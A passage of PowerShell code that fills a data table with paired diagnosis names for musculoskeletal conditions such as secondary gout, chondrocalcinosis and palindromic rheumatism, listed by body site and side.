$DiagnosisList.Rows.Add("Gout due to renal impairment, wrist","Gout due to renal impairment, right wrist") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, wrist","Gout due to renal impairment, left wrist") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, wrist","Gout due to renal impairment, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hand","Gout due to renal impairment, right hand") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hand","Gout due to renal impairment, left hand") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hand","Gout due to renal impairment, unspecified hand") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hip","Gout due to renal impairment, right hip") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hip","Gout due to renal impairment, left hip") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, hip","Gout due to renal impairment, unspecified hip") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, knee","Gout due to renal impairment, right knee") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, knee","Gout due to renal impairment, left knee") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, knee","Gout due to renal impairment, unspecified knee") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, ankle and foot","Gout due to renal impairment, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, ankle and foot","Gout due to renal impairment, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, ankle and foot","Gout due to renal impairment, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, vertebrae","Gout due to renal impairment, vertebrae") + $null = $DiagnosisList.Rows.Add("Gout due to renal impairment, multiple sites","Gout due to renal impairment, multiple sites") + $null = $DiagnosisList.Rows.Add("Other secondary gout","Other secondary gout, unspecified site") + $null = $DiagnosisList.Rows.Add("Other secondary gout, shoulder","Other secondary gout, right shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary gout, shoulder","Other secondary gout, left shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary gout, shoulder","Other secondary gout, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary gout, elbow","Other secondary gout, right elbow") + $null = $DiagnosisList.Rows.Add("Other secondary gout, elbow","Other secondary gout, left elbow") + $null = $DiagnosisList.Rows.Add("Other secondary gout, elbow","Other secondary gout, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other secondary gout, wrist","Other secondary gout, right wrist") + $null = $DiagnosisList.Rows.Add("Other secondary gout, wrist","Other secondary gout, left wrist") + $null = $DiagnosisList.Rows.Add("Other secondary gout, wrist","Other secondary gout, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hand","Other secondary gout, right hand") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hand","Other secondary gout, left hand") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hand","Other secondary gout, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hip","Other secondary gout, right hip") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hip","Other secondary gout, left hip") + $null = $DiagnosisList.Rows.Add("Other secondary gout, hip","Other secondary gout, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other secondary gout, knee","Other secondary gout, right knee") + $null = $DiagnosisList.Rows.Add("Other secondary gout, knee","Other secondary gout, left knee") + $null = $DiagnosisList.Rows.Add("Other secondary gout, knee","Other secondary gout, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other secondary gout, ankle and foot","Other secondary gout, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other secondary gout, ankle and foot","Other secondary gout, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other secondary gout, ankle and foot","Other secondary gout, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other secondary gout, vertebrae","Other secondary gout, vertebrae") + $null = $DiagnosisList.Rows.Add("Other secondary gout, multiple sites","Other secondary gout, multiple sites") + $null = $DiagnosisList.Rows.Add("Gout, unspecified","Gout, unspecified") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease","Hydroxyapatite deposition disease, unspecified site") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, shoulder","Hydroxyapatite deposition disease, right shoulder") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, shoulder","Hydroxyapatite deposition disease, left shoulder") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, shoulder","Hydroxyapatite deposition disease, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, elbow","Hydroxyapatite deposition disease, right elbow") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, elbow","Hydroxyapatite deposition disease, left elbow") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, elbow","Hydroxyapatite deposition disease, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, wrist","Hydroxyapatite deposition disease, right wrist") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, wrist","Hydroxyapatite deposition disease, left wrist") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, wrist","Hydroxyapatite deposition disease, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hand","Hydroxyapatite deposition disease, right hand") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hand","Hydroxyapatite deposition disease, left hand") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hand","Hydroxyapatite deposition disease, unspecified hand") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hip","Hydroxyapatite deposition disease, right hip") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hip","Hydroxyapatite deposition disease, left hip") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, hip","Hydroxyapatite deposition disease, unspecified hip") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, knee","Hydroxyapatite deposition disease, right knee") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, knee","Hydroxyapatite deposition disease, left knee") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, knee","Hydroxyapatite deposition disease, unspecified knee") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, ankle and foot","Hydroxyapatite deposition disease, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, ankle and foot","Hydroxyapatite deposition disease, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, ankle and foot","Hydroxyapatite deposition disease, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, vertebrae","Hydroxyapatite deposition disease, vertebrae") + $null = $DiagnosisList.Rows.Add("Hydroxyapatite deposition disease, multiple sites","Hydroxyapatite deposition disease, multiple sites") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis","Familial chondrocalcinosis, unspecified site") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, shoulder","Familial chondrocalcinosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, shoulder","Familial chondrocalcinosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, shoulder","Familial chondrocalcinosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, elbow","Familial chondrocalcinosis, right elbow") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, elbow","Familial chondrocalcinosis, left elbow") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, elbow","Familial chondrocalcinosis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, wrist","Familial chondrocalcinosis, right wrist") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, wrist","Familial chondrocalcinosis, left wrist") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, wrist","Familial chondrocalcinosis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hand","Familial chondrocalcinosis, right hand") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hand","Familial chondrocalcinosis, left hand") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hand","Familial chondrocalcinosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hip","Familial chondrocalcinosis, right hip") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hip","Familial chondrocalcinosis, left hip") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, hip","Familial chondrocalcinosis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, knee","Familial chondrocalcinosis, right knee") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, knee","Familial chondrocalcinosis, left knee") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, knee","Familial chondrocalcinosis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, ankle and foot","Familial chondrocalcinosis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, ankle and foot","Familial chondrocalcinosis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, ankle and foot","Familial chondrocalcinosis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, vertebrae","Familial chondrocalcinosis, vertebrae") + $null = $DiagnosisList.Rows.Add("Familial chondrocalcinosis, multiple sites","Familial chondrocalcinosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis","Other chondrocalcinosis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, shoulder","Other chondrocalcinosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, shoulder","Other chondrocalcinosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, shoulder","Other chondrocalcinosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, elbow","Other chondrocalcinosis, right elbow") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, elbow","Other chondrocalcinosis, left elbow") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, elbow","Other chondrocalcinosis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, wrist","Other chondrocalcinosis, right wrist") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, wrist","Other chondrocalcinosis, left wrist") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, wrist","Other chondrocalcinosis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hand","Other chondrocalcinosis, right hand") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hand","Other chondrocalcinosis, left hand") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hand","Other chondrocalcinosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hip","Other chondrocalcinosis, right hip") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hip","Other chondrocalcinosis, left hip") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, hip","Other chondrocalcinosis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, knee","Other chondrocalcinosis, right knee") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, knee","Other chondrocalcinosis, left knee") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, knee","Other chondrocalcinosis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, ankle and foot","Other chondrocalcinosis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, ankle and foot","Other chondrocalcinosis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, ankle and foot","Other chondrocalcinosis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, vertebrae","Other chondrocalcinosis, vertebrae") + $null = $DiagnosisList.Rows.Add("Other chondrocalcinosis, multiple sites","Other chondrocalcinosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies","Other specified crystal arthropathies, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, shoulder","Other specified crystal arthropathies, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, shoulder","Other specified crystal arthropathies, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, shoulder","Other specified crystal arthropathies, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, elbow","Other specified crystal arthropathies, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, elbow","Other specified crystal arthropathies, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, elbow","Other specified crystal arthropathies, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, wrist","Other specified crystal arthropathies, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, wrist","Other specified crystal arthropathies, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, wrist","Other specified crystal arthropathies, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hand","Other specified crystal arthropathies, right hand") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hand","Other specified crystal arthropathies, left hand") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hand","Other specified crystal arthropathies, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hip","Other specified crystal arthropathies, right hip") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hip","Other specified crystal arthropathies, left hip") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, hip","Other specified crystal arthropathies, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, knee","Other specified crystal arthropathies, right knee") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, knee","Other specified crystal arthropathies, left knee") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, knee","Other specified crystal arthropathies, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, ankle and foot","Other specified crystal arthropathies, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, ankle and foot","Other specified crystal arthropathies, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, ankle and foot","Other specified crystal arthropathies, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, vertebrae","Other specified crystal arthropathies, vertebrae") + $null = $DiagnosisList.Rows.Add("Other specified crystal arthropathies, multiple sites","Other specified crystal arthropathies, multiple sites") + $null = $DiagnosisList.Rows.Add("Crystal arthropathy, unspecified","Crystal arthropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud]","Chronic postrheumatic arthropathy [Jaccoud], unspecified site") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], shoulder","Chronic postrheumatic arthropathy [Jaccoud], right shoulder") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], shoulder","Chronic postrheumatic arthropathy [Jaccoud], left shoulder") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], shoulder","Chronic postrheumatic arthropathy [Jaccoud], unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], elbow","Chronic postrheumatic arthropathy [Jaccoud], right elbow") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], elbow","Chronic postrheumatic arthropathy [Jaccoud], left elbow") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], elbow","Chronic postrheumatic arthropathy [Jaccoud], unspecified elbow") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], wrist","Chronic postrheumatic arthropathy [Jaccoud], right wrist") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], wrist","Chronic postrheumatic arthropathy [Jaccoud], left wrist") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], wrist","Chronic postrheumatic arthropathy [Jaccoud], unspecified wrist") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hand","Chronic postrheumatic arthropathy [Jaccoud], right hand") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hand","Chronic postrheumatic arthropathy [Jaccoud], left hand") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hand","Chronic postrheumatic arthropathy [Jaccoud], unspecified hand") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hip","Chronic postrheumatic arthropathy [Jaccoud], right hip") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hip","Chronic postrheumatic arthropathy [Jaccoud], left hip") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], hip","Chronic postrheumatic arthropathy [Jaccoud], unspecified hip") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], knee","Chronic postrheumatic arthropathy [Jaccoud], right knee") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], knee","Chronic postrheumatic arthropathy [Jaccoud], left knee") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], knee","Chronic postrheumatic arthropathy [Jaccoud], unspecified knee") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], ankle and foot","Chronic postrheumatic arthropathy [Jaccoud], right ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], ankle and foot","Chronic postrheumatic arthropathy [Jaccoud], left ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], ankle and foot","Chronic postrheumatic arthropathy [Jaccoud], unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], other specified site","Chronic postrheumatic arthropathy [Jaccoud], other specified site") + $null = $DiagnosisList.Rows.Add("Chronic postrheumatic arthropathy [Jaccoud], multiple sites","Chronic postrheumatic arthropathy [Jaccoud], multiple sites") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease","Kaschin-Beck disease, unspecified site") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, shoulder","Kaschin-Beck disease, right shoulder") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, shoulder","Kaschin-Beck disease, left shoulder") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, shoulder","Kaschin-Beck disease, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, elbow","Kaschin-Beck disease, right elbow") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, elbow","Kaschin-Beck disease, left elbow") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, elbow","Kaschin-Beck disease, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, wrist","Kaschin-Beck disease, right wrist") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, wrist","Kaschin-Beck disease, left wrist") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, wrist","Kaschin-Beck disease, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hand","Kaschin-Beck disease, right hand") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hand","Kaschin-Beck disease, left hand") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hand","Kaschin-Beck disease, unspecified hand") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hip","Kaschin-Beck disease, right hip") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hip","Kaschin-Beck disease, left hip") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, hip","Kaschin-Beck disease, unspecified hip") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, knee","Kaschin-Beck disease, right knee") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, knee","Kaschin-Beck disease, left knee") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, knee","Kaschin-Beck disease, unspecified knee") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, ankle and foot","Kaschin-Beck disease, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, ankle and foot","Kaschin-Beck disease, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, ankle and foot","Kaschin-Beck disease, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, vertebrae","Kaschin-Beck disease, vertebrae") + $null = $DiagnosisList.Rows.Add("Kaschin-Beck disease, multiple sites","Kaschin-Beck disease, multiple sites") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented)","Villonodular synovitis (pigmented), unspecified site") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), shoulder","Villonodular synovitis (pigmented), right shoulder") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), shoulder","Villonodular synovitis (pigmented), left shoulder") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), shoulder","Villonodular synovitis (pigmented), unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), elbow","Villonodular synovitis (pigmented), right elbow") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), elbow","Villonodular synovitis (pigmented), left elbow") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), elbow","Villonodular synovitis (pigmented), unspecified elbow") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), wrist","Villonodular synovitis (pigmented), right wrist") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), wrist","Villonodular synovitis (pigmented), left wrist") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), wrist","Villonodular synovitis (pigmented), unspecified wrist") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hand","Villonodular synovitis (pigmented), right hand") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hand","Villonodular synovitis (pigmented), left hand") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hand","Villonodular synovitis (pigmented), unspecified hand") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hip","Villonodular synovitis (pigmented), right hip") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hip","Villonodular synovitis (pigmented), left hip") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), hip","Villonodular synovitis (pigmented), unspecified hip") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), knee","Villonodular synovitis (pigmented), right knee") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), knee","Villonodular synovitis (pigmented), left knee") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), knee","Villonodular synovitis (pigmented), unspecified knee") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), ankle and foot","Villonodular synovitis (pigmented), right ankle and foot") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), ankle and foot","Villonodular synovitis (pigmented), left ankle and foot") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), ankle and foot","Villonodular synovitis (pigmented), unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), other specified site","Villonodular synovitis (pigmented), other specified site") + $null = $DiagnosisList.Rows.Add("Villonodular synovitis (pigmented), multiple sites","Villonodular synovitis (pigmented), multiple sites") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism","Palindromic rheumatism, unspecified site") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, shoulder","Palindromic rheumatism, right shoulder") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, shoulder","Palindromic rheumatism, left shoulder") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, shoulder","Palindromic rheumatism, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, elbow","Palindromic rheumatism, right elbow") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, elbow","Palindromic rheumatism, left elbow") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, elbow","Palindromic rheumatism, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, wrist","Palindromic rheumatism, right wrist") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, wrist","Palindromic rheumatism, left wrist") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, wrist","Palindromic rheumatism, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hand","Palindromic rheumatism, right hand") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hand","Palindromic rheumatism, left hand") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hand","Palindromic rheumatism, unspecified hand") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hip","Palindromic rheumatism, right hip") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hip","Palindromic rheumatism, left hip") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, hip","Palindromic rheumatism, unspecified hip") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, knee","Palindromic rheumatism, right knee") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, knee","Palindromic rheumatism, left knee") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, knee","Palindromic rheumatism, unspecified knee") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, ankle and foot","Palindromic rheumatism, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, ankle and foot","Palindromic rheumatism, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, ankle and foot","Palindromic rheumatism, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, other specified site","Palindromic rheumatism, other specified site") + $null = $DiagnosisList.Rows.Add("Palindromic rheumatism, multiple sites","Palindromic rheumatism, multiple sites") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis","Intermittent hydrarthrosis, unspecified site") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, shoulder","Intermittent hydrarthrosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, shoulder","Intermittent hydrarthrosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, shoulder","Intermittent hydrarthrosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, elbow","Intermittent hydrarthrosis, right elbow") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, elbow","Intermittent hydrarthrosis, left elbow") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, elbow","Intermittent hydrarthrosis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, wrist","Intermittent hydrarthrosis, right wrist") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, wrist","Intermittent hydrarthrosis, left wrist") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, wrist","Intermittent hydrarthrosis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hand","Intermittent hydrarthrosis, right hand") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hand","Intermittent hydrarthrosis, left hand") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hand","Intermittent hydrarthrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hip","Intermittent hydrarthrosis, right hip") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hip","Intermittent hydrarthrosis, left hip") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, hip","Intermittent hydrarthrosis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, knee","Intermittent hydrarthrosis, right knee") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, knee","Intermittent hydrarthrosis, left knee") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, knee","Intermittent hydrarthrosis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, ankle and foot","Intermittent hydrarthrosis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, ankle and foot","Intermittent hydrarthrosis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, ankle and foot","Intermittent hydrarthrosis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, other site","Intermittent hydrarthrosis, other site") + $null = $DiagnosisList.Rows.Add("Intermittent hydrarthrosis, multiple sites","Intermittent hydrarthrosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy","Traumatic arthropathy, unspecified site") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, shoulder","Traumatic arthropathy, right shoulder") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, shoulder","Traumatic arthropathy, left shoulder") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, shoulder","Traumatic arthropathy, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Traumatic arthropathy, 